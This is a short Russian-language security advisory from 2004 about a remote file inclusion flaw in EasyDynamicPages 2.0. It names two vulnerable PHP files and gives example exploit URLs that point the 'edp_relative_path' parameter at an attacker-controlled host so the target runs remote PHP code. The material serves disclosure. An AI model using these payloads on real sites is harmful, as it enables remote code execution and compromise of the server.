Дата публикации: | 04.01.2004 |
Всего просмотров: | 907 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | EasyDynamicPages 2.x |
Уязвимые версии: EasyDynamicPages 2.0
Описание: Уязвимость включения файла обнаружена в EasyDynamicPages. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе. Файлы '/admin/config.php' и '/dynamicpages/fast/config_page.php' включают файлы без проверки включаемых файлов. В результате удаленный пользователь может представить специально обработанный URL, который выполнит произвольный PHP файл, расположенный на удаленной системе. Пример/Эксплоит: http://[target]/admin/config.php/edp_relative_path=http://[attacker]/ http://[target]/dynamicpages/fast/config_page.p hp?do=add_page&du=site&edp_relative_path=http://attacker/ URL производителя: http://software.stoitsov.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | include() vuln in EasyDynamicPages v.2.0 |